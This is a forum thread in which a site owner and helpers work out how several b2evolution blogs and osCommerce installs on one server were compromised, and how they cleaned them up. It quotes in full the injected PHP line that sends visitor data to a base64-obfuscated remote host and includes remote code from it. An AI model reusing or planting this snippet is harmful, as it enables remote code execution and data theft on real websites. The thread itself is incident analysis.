more than likely its a post gone awry, or a link or item in the sidebar not loading, or a piece of code-something ...

its not, reads that again, not, a vulnerability or a hacked site.

A url would be most helpful though if you expect anything beyond general comments in the way of assistance.

whoo,

This has happened to four unconnected blogs across different urls. (the only connection is me and the server). The code is completely gone - it is not just a link that isn't working.

Until I'm satisfied that there isn't some vulnerability, no I would prefer not to share the URL's of them just yet. I need to do some more investigation.

.. as you wish, nice dog you have btw :P

--

fwiw, you cannot depend on what your browser outputs to tell you that "code is missing" you need to look to look at the actual files themselves.

--

Im presently looking at several of your blogs and seeing no issues .. remember im admin here so I get to see your email, I can google that and from there its just a matter of following some links.

Sneaky.

Yes I quickly cut and pasted code back into the _main.php but all of the customization I had is gone until I recover it from my backup files (I was at work when I noticed the problem).

Yes I was looking at the actual code itself.

i love dogs. ;) but you wont ever catch me in a thong. :oops:

I'm looking at the skins/custom/ directory on one of the affected sites. Every php file in that directory has an edit date of April 16th, all at the same time. There is a new line at the bottom of some of the php files that looks something like this:

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ?
$_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".
base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".
base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){}
else {include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

One of the other affected blogs I'm checking has all its files in that directory also edited at the exact same time and date.

I see that that decodes to include a url of user7.phpinclude.ru

Any ideas?

[edited to stop wide screen scroll]

Apparently it's some sort of code injection.
I'm googling and found this threat I'm reading through now:

http://forums.digitalpoint.com/showthread.php?t=56721

Using the command:

grep -r base64_encode *

I see that this has been inserted into MANY of my b2evolution files. This is going to take a long time to fix. Too bad I didn't discover it on the day it happened or I could have restored my nightly back-up.

I just turned off register_globals in my php.ini file.

Monty, which b2evolution version are you using?

I don't think it's a security hole with b2evolution.. do you have other applications running on this webserver(s)? Are they shared once? Can you check if someone has used your account/password?

On http://www.phpinclude.ru/ there's a "report abuse" email address. Though it could be spam, I'd try to contact them (with some throw-away email address).

OTOH, http://www.dnsstuff.com/tools/whois.ch?ip=http://www.phpinclude.ru/&email=on shows a different e-mail address.

Googling for ".phpinclude.ru" shows a lot of infected sites (where PHP warnings are thrown, so in reality it are probably a lot more).

It seems that the "include"-statement that gets done "just" adds links to the page.

...not a vulnerability or a hacked site.

oof, I stand corrected, or rather sit.

Version 0.9.1

I am the only one with access to the server. Only my b2evolution blogs have this phpinclude.ru and base64_encode things added to it. Everything else appears fine.

I checked the raw access logs for one of the affected blogs. There was an ip that spidered 2 images and a css file at that time, but nothing overly suspicious.

The timestamp of the files does not have to give the real date of the attack.

Are you using "plain" FTP (which sends passwords unencrypted)?

Do you use some admin panel like cPanel, where you send your data without using SSL/https?

Do you have installed other software on the server, e.g. CubeCart - which I've seen mentioned in the linked thread (and the ones linked from there)?

I'd setup the whole box freshly, especially if you cannot find out where they are coming from.

If I've understand correctly, they are still coming back after you remove the code?

Have you changed all your passwords?

Thanks blueyed, I'm still trying to piece this all together.

No there were no more subsequent attacks. I don't believe there was any access to my server or with my password, it was some sort of sql injection in combination with the register_globals defaulted to on, but I'm still reading through message board threads where this type of thing is mentioned so I can get a better handle on it.

Changing my passwords was the first thing I did when I noticed my sidebar code was gone.

I do use cPanel, and I upload all of my files with CuteFTP. I use SSH and not telnet. I don't have CubeCart installed. The only other free/open source type of script I have running is two copies of osCommerce which don't seem to be touched.

I read a recommendation for a security company that can do a security audit of your server and patch up any "holes". I'm thinking this may be a worthwhile investment. My server is already on a managed contract, but now I'm nervous.

Just to update this thread, in case it happens to someone else, it turns out the two copies of OSCommerce I have running on the server were also affected, I just didn't notice immediately. Files in the language directory were changed, a configure.php file was changed, and some odd new .php files were added (eg. report.php, time.php, date.php). All affected files had the identical time stamp.

The only other php appplication I had on the server, besides OSCommerce and b2evolution, was a phpbb that I had decided not to use (but it was current and up to date). One of the three let someone mess around - I just completely deleted the php board rather than check it for malicious files.

I read that one of the things this 'hack', 'injection', whatever it was, does - it tries to change your Google Adsense code to their's. This is why my sidebars on my b2evolution blogs were sliced short - they were erased at the point of my Google Ads onward.

So far none of this has reoccurred. From what I've read, turning off the register_globals in the php.ini file is crucial to preventing this from happening.